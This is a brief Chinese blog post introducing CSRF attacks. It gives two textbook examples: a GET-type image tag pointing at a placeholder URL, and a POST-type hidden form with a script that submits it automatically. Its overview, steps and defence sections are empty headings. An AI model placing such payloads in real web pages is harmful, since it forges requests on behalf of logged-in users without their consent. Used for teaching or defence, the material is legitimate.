CSRF 攻击

2022-03-25  本文已影响0人  申_9a33

概述

CSRF攻击满足步骤

攻击类型

1.GET型CSRF

<img src=http://xxx.com/csrf?xx=11 /> 

2.POST型CSRF

<form action=http://wooyun.org/csrf.php method=POST>
<input type="text" name="xx" value="11" />
</form>
<script> document.forms[0].submit(); </script> 

防御手段

上一篇下一篇

猜你喜欢

热点阅读